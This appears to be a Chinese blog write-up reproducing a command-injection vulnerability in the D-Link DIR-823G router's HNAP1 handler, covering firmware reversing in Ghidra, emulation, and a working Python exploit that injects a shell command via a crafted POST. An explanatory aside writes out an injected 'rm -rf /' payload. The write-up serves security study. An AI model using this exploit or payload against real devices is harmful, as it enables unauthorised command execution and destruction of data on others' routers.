百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

路由器安全研究|D- Link DIR-823G v1.02 B05 复现与利用思路

haoteby 2025-05-05 15:45 36 浏览

前言

D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行任意的操作系统命令

漏洞分析

binwalk提取固件,成功获取到固件

现在我们已经进入到应用里了,那么我们在进行分析固件的时候,应该怎么去分析这个情况?首先,我们去分析别人的漏洞,别人是会告诉哪里会出现问题。但是我们现在假设我们是分析一个未知固件,我们就得先知道这个固件有哪些应用,启动了哪些服务,最清晰和简便的方式就是去看我们etc文件下面,里面有个叫init.d的目录,里面是关于启动项的内容

我们首先来看rcS下面的内容 vim rcS

首先是设置ip,然后挂载了两个文件系统分别是proc,这是与进程相关的文件系统,包括当前进程启动存放在哪个地址

还有ramfs文件系统,根据以前的笔记,可知ramfs文件系统跟RAM相关

然后下面就是判断是否还有挂载别的文件系统

然后mkdir就是创建各种各样的文件夹,都有对应的功能,比如说创建了pptp文件夹,针对拨号上网的功能,然后还有smbd服务,可以看到创建了一个usb的文件夹,说明该固件有可以跟usb也就是U盘相关的操作,接下来都是一些配置信息

继续往下翻

可以看到该固件启动了web server的web服务,也就是httpd的内容,这里启动的是goahead,通过这个名字,我们可以确定web服务就是goahead,如果想要分析web服务的话,就直接分析goahead就可以

我们回到squashfs-root目录下,搜索goahead的一些简单情况

grep -ir "goahead" .

最下面是两个启动项的内容,可以忽略,然后第一行是bin的可执行应用,这个其实就是我们最后分析的内容

那如何分析呢?它是一个HNAP1请求,那就可以去检索我们的HANP1请求

grep -ir "HNAP1" .

可以看到它检索到一些js代码,js代码对我们来说一般,(比较我们是找二进制相关的漏洞)

但是,我们可以发现它匹配了一个二进制程序,也就是goahead

这里我们先科普一下goahead的一些情况:

GoAhead ,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer

goahead的websUrlHandlerDefine函数允许用户自定义不同url的处理函数

它在进行编写与它相关的请求,是通过websUrlHandlerDefine来确定的

websUrlHandlerDefine(T("/HNAP1"),NULL,0, websHNAPHandler,0);
  • websUrlHandlerDefine(T("/goform"),NULL,0, websFormHandler,0);
  • websUrlHandlerDefine(T("/cgi.bin"),NULL,0, websCgiHandler,0);
  • 使用ghidra进行逆向分析,goahead二进制文件在squashfs-root目录下的bin目录下

    那进入到goahead反编译界面该如何分析呢?一种是找到main函数去进行分析,比较耗时

    一种是通过关键字来搜索,反推调用情况,来推测每个功能的解析情况 ctrl+shift+E

    匹配成功,停在指定区域

    但是它所对应的反编译代码还是很多的,所以我们可以通过反编译出来的函数名,进行查看它的调用关系

    一路往下翻,终于找到我们所要的东西

    而且我们看到,这个函数继续往上调的话就是main函数了,所以其实一开始也是可以从main函数来分析的(0.0)

    所以现在我们可以重点来分析这个函数

    前面还是做一些判断,然后请求还有不止HNAP1,对应的都是一个函数。

    同一个函数做的事情,类似于websUrlHandlerDefine这个函数,那HANP1对应的函数是

    FUN_0042383c,那就双击进去看看

    这里就是漏洞点,这里执行了memset和snprintf,一般来说这里应该是不存在漏洞点,但是下面一条语句是system,也就是把格式化化的字符串直接就拿到了system函数作为参数传递进去,而snprintf这里的参数有个echo,有个单引号问题

    比如说正常代码

    #!/bin/bash
    
  • read -p "Enter your name: " name
  • echo 'Hello, '$name'!'
  • 攻击步骤

    正常输入:用户输入 Alice,输出:

    Hello, Alice!

    恶意输入:用户输入 '$(id)',此时脚本实际执行的命令变为:

    echo 'Hello, ''$(id)'!'

    输出:

    Hello, $(id)!

    单引号内的 $(id) 不会被执行,暂时安全。

    更危险的输入:用户输入 ' && rm -rf / #,命令变为:

    echo 'Hello, '' && rm -rf / #'!

    此时,第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令,在 echo 之后执行。# 注释掉后续的 '!,避免语法错误。

    那么会导致rm -rf / 会被执行,删除系统文件!

    所以,如果我们构造一些恶意的代码写入到snprintf中,再传递到system函数,就会造成命令注入漏洞

    但是我们要进到漏洞点的话,还需要满足函数上面的一些要求

    所以我们得符合上面函数的一些限制才能进入到漏洞点来,这里先取了PTRs_SetMultipleActions_00588d80的首地址,赋值给DAT_0058a6c4,然后DAT_0058a6c4自身判断和自加2来进行循环判断,用strstr函数查找DAT_0058a6c4在param+0x524中出现的位置,并赋值给pcVar1,如果pcVar1的值不为0的话,就会进入到我们的漏洞点来

    DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关,双击进去看看

    可以看到里面都是它对应的一些方法,比如说SetMultipleActions之类的

    固件模拟

    分析到这里,基本上是明朗了,接下来就要进行固件模拟操作,使用firmadyne模拟固件启动

    sudo ./DIR823G_V1.0.2B05_20181207.sh

    然后firmadyne默认的密码就是firmadyne

    得等一段时间,然后192.168.0.1

    但是这个一直搞不定,模拟不起来,也不知道是什么原因,排查不出

    然后换成了firmware analysis plus (fap)这个框架,就模拟起来了

    等一段时间后,回车,就可以模拟起来了,输入192.168.0.1

    进入向导,随便输入点东西

    密码8位,输入12345678

    然后就开始配置一些内容,同时可以注意到左侧已经把一些数据写入到关键的文件夹中

    配置完毕,登录,成功进入路由器

    exp编写

    #!/usr/bin/env python
    
  • #-*- coding:utf-8 -*-

  • import requests

  • ip='192.168.0.1'

  • command="'`echo aaaaaaaaa > /web_mtn/test.txt`'"
  • length=len(command)

  • headers=requests.utils.default_headers()
  • headers["Content-Length"]=str(length)
  • headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
  • headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"'
  • headers["Content-Type"]="text/xml; charset=UTF-8"
  • headers["Accept"]="*/*"
  • headers["Accept-Encoding"]="gzip, deflate"
  • headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8"

  • payload=command
  • r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload)
  • 因为是http请求,所以我们使用requests,然后设置ip,设置命令,构造报头,最后post请求将HNAP1,headers和payload都传过去

    复现完毕,ctrl+a 然后x结束固件模拟

    相关推荐

    DIY桌面激光雕刻机#是时候展现真正的技术了

    激光雕刻机。这期视频我们来看一下我是如何DIY一台桌面激光雕刻机。前几天在水池子边上发现了一台旧电脑,我看这电脑上还有一些东西可以利用到,比如光驱上面拆出了步进电机和滑轨。所以本期视频我将用这些废品去...

    100000块多米诺骨牌拼成超级马里奥,这款机器人1天就完成了

    智东西(公众号:zhidxcom)编译|王健恩编辑|高歌智东西7月30日消息,美国工程师兼YouTube博主MarkRober创造出了一个可以自动摆放多米诺骨牌的机器人。这个机器人被命名为D...

    这个3D打印机器人可以在30秒内打开密码锁

    密码锁看似很安全?也许曾经是,但现在你可要当心了!这是因为一台3D打印制造的机器人就可以在半分钟内打开你的密码锁。上周四,知名黑客萨米·卡姆卡尔(SamyKamkar)在自己的网站上公布了一个称之为...

    密码锁也不安全 这款机器人30秒即可自动打开

    大学生和体育爱好者们要注意了,千万不要再把贵重物品存放在公共储物柜里。因为现在已经出现了一种3D打印的机器人,据说世界上各大锁商推出的大部分密码锁,它都能够在30秒之内打开。著名黑客山米·卡姆卡(Sa...

    硬件单片机模拟器,再也不用买开发板了...

    #头条创作挑战赛#记得2006年在凌阳科技(sunplus)工作的时候,凌阳科技开发了自己的编译器/集成开发环境(unspIDE),那个IDE除了有keil那样的编辑器、编译器、链接器、调试器、下载...

    3D打印机分哪几部分构成?(3d打印机结构组成及系统分析)

    3D打印机的构成根据技术类型(如FDM、SLA、SLS等)有所不同,但以最常见的FDM(熔融沉积成型)3D打印机为例,其核心组成部分可分为以下模块:1.机械结构框架提供整体支撑和稳定性,常见材质为金...

    初学者学伺服都需要什么?石家庄诺仕通

    #初学者学伺服都需要什么?#对于初学者学习伺服系统,需要从...

    arduino(arduino是单片机吗)

    arduino学习笔记arduino学习笔记1-什么是arduino?...

    自制写字机,你需要的全套资料都在这里

    小编之前发过《用废旧光驱制作迷你绘图仪》,很多读者都成功制作了自己的绘图仪。但是该方法的缺点是gcode要在inkscape软件中生成,然后通过grbl-controller这个没有界面的程序发送画图...

    自己动手DIY3D打印机 瞬间效果出现桌面时,大家都惊呆了!

    3D打印机,对数码产品比较了解的朋友都知道,但是真正玩过的童鞋可能就不多了。其实3D打印机离我们并不远,随着3D打印技术越来越成熟,3D打印机的学习资料也越来越多,这让自己动手做一台桌面3D打印机也成...

    机器人仅用24小时将十万块多米诺骨牌拼出马里奥,创下世界纪录

    十万块多米诺骨牌倒下是个啥场面?等等,十万块?那得搭多久啊?...

    如何制作一个机器人?(制作机器人的方法)

    1.简单机械机器人(例如自动小车)2.智能机器人(带有人工智能或计算机视觉)3.工业机器人(用于生产自动化)4.人形机器人(类人结构,可以行走、对话)...

    CrowPi2树莓派4学习套件评测第1部分–开箱和首次启动

    文章来源:CNXSoftware中文站2020年6月,我曾写过一篇关于深圳易科诺...

    基于 Arduino UNO 的蓝牙汽车(arduino智能小车蓝牙控制app)

    HC-05蓝牙模块HC-05是一款易于使用的蓝牙SPP模块,针对流畅的串行无线通信配置进行了优化。串口蓝牙模块是完全合格的蓝牙V2.0+EDR(增强数据速率)3Mbps调制,具有总2.4...

    电机驱动设计方案带你初识机电一体化

    在直流电机驱动电路的设计中,主要考虑以下几点:功能:电机是单向还是双向转动?需不需要调速?...